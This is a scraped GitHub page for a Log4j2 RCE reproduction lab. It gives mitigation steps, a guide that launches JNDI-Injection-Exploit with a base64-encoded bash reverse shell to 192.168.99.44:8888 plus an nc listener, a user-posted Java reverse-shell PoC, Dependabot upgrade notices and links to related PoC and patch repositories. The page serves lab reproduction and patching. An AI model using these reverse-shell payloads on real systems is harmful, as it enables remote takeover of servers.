log4j2 rce、poc

Last update: Dec 4, 2022

Related tags

Spring Boot log4j2_rce

Overview

Apache Log4j 2

Apache log4j2 开源日志组件远程代码执行

攻击者通过构造恶意请求，触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置，经验证，最新版的补丁可以防护此问题

官方最新补丁： log4j-2.15.0-rc2

紧急处置方案

2.10 or 以上：添加环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS="true" 或修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
2.7 or 以上：log4j config file 中用%m(nolookups) 代替 %m
2.0-beta9 or 以上: 删除jar 包中的org/apache/logging/log4j/core/lookup/JndiLookup.class
通过防火墙自定义规则，限制jndi 、ldap、rmi 等恶意payload
漏洞探测大多采用dnslog 等带外方式，可以禁掉服务器主动外联权限

漏洞复现

详细复现步骤参考 fastjson-rce ，与fastjson 的复现一致，只是使用的pom 文件不同而已

需要注意2.14.1 不能稳定复现，建议采用2.8.x 版本

环境下载

log4j2_rce-0.0.1.jar

反弹shell 指引

下载命令执行工具，也可以编译Exploit.java 将计算器换成Linux反弹代码，这里为了方便直接使用 JNDI-Injection-Exploit-1.0.jar
开启利用工具 java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguOTkuNDQvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.99.44"
1. 命令说明：-C 指定要执行的命令，-A 指定监听端口所在IP（一般为本机IP）
2. base64 编码部分为Linux 反弹shell bash -i > /dev/tcp/192.168.99.44/8888 0>&1
3. 将利用工具生成的jndi links 放入postman payload 中
本地开启nc 监听 nc -Lvvp 888
发送payload 到目标服务器，反弹shell 成功
利用过程截图: 、

Comments

反弹SHELL卡死

POC

Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/ip/9082 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();

如上图，已成功连接，无法执行命令

望回复

opened by zzzzls 4

Bump log4j-core from 2.8.1 to 2.16.0
Bumps log4j-core from 2.8.1 to 2.16.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 1
Bump log4j-api from 2.8.1 to 2.15.0
Bumps log4j-api from 2.8.1 to 2.15.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 1
Bump log4j-core from 2.8.1 to 2.15.0
Bumps log4j-core from 2.8.1 to 2.15.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 1
Bump log4j-core from 2.8.1 to 2.17.1
Bumps log4j-core from 2.8.1 to 2.17.1.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 0
Bump log4j-api from 2.8.1 to 2.16.0
Bumps log4j-api from 2.8.1 to 2.16.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 0
Reference Class Name: foo

师傅我复现的时候出现这个问题该怎么解决呀 ERROR com.kk.log4j2_rce.controller.UserController - Reference Class Name: foo

https://s2.loli.net/2021/12/11/hr4iKmXwgqFQAuf.png

opened by John-tlh 2

Releases(0.1.0)

0.1.0(Mar 18, 2022)

Bug release
Source code(tar.gz)
Source code(zip)
0.0.2(Dec 13, 2021)

Source code(tar.gz)
Source code(zip)
log4j2_rce-0.0.2.jar(18.07 MB)
0.0.1(Dec 10, 2021)

prepared
Source code(tar.gz)
Source code(zip)
log4j2_rce-0.0.1.jar(18.07 MB)

Owner

GitHub https://github.com/dbgee/log4j2_rce

Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o

439 Jan 6, 2023

Non intrusive log4j2 RCE vulnerability patch.

Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w

67 Dec 2, 2022

spring-cloud-function SpEL RCE, Vultarget & Poc

spring-cloud-function SpEL RCE Vultarget You can build it for youself. here is the source of the Vuln App Or you can use the release which built by cc

133 Nov 30, 2022

Apache/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions <= 2.7.6 With Different Gadgets

The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da

51 Apr 24, 2022

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

2 Dec 21, 2021

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Log4j 2 CVE-2021-44228 测试样本应用基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) 可用接口接口请求方法参数 vulnerable_request_get GET v=payload vulnerable_reque

3 Mar 23, 2022

A log4j2 plugin to Eclipse.

Ganymede A log4j2 log viewer plugin for Eclipse. Installation Use the Eclipse update site: Ganymede2 - https://dbusche.github.io/Ganymede2/ History Th

3 Dec 15, 2022

log4j2-vaccine

Log4j2-Vaccine 一款用于log4j2漏洞的疫苗，基于Instrumentation机制进行RASP防护，Patch了 org.apache.logging.log4j.core.net.JndiManager的lookup方法，部分代码借用了arthas的实现 Usage1: Java

84 Dec 2, 2022

POC showing how to divide endpoint(s) among different Open-API screens

Multiple Open-API groups: Spring boot POC showing how to divide endpoint(s) among different Open-API screens Demo Link (Select definition from top rig

6 Dec 15, 2022

Log4J CVE-2021-44228 Minecraft PoC

CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin

5 Feb 15, 2022

LightAdmin - [PoC] Pluggable CRUD UI library for Java web applications

LightAdmin - [PoC] Pluggable CRUD UI library for Java web applications The primary goal of this PoC project is to speed up application development by

655 Dec 16, 2022

PoC for CVE-2021-31805 (Apache Struts2)

CVE-2021-31805 PoC for CVE-2021-31805 (Apache Struts2) CVE-2021-31805の解説記事で使用したアプリケーションです。セットアップ $ docker-compose build $ docker-compose up -d 動作確認

4 May 21, 2022

Slueth(Zipkin) 를 통한 SQS Message Tracing POC(Proof of concept) 입니다.

Sleuth AWS SQS POC 해당 프로젝트는 Slueth(Zipkin) 를 통한 메시지 추적 POC(Proof of concept) 입니다. Rest API 를 통해 POST 요청을 받으면, 메시지를 발행/소비 합니다. 이 과정에서 유지되는 TraceId 를 확인

10 Nov 29, 2022

CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

29 Nov 21, 2022

spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧

spring-boot-upload-file-lead-to-rce-tricks 一. 原理文章 Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索二. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-writ

540 Jan 8, 2023

CVE-2021-44228 - Apache log4j RCE quick test

Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha

3 Feb 1, 2022

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB

CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel

10 Sep 24, 2022

Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com

108 Dec 23, 2021

Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas

181 Dec 2, 2022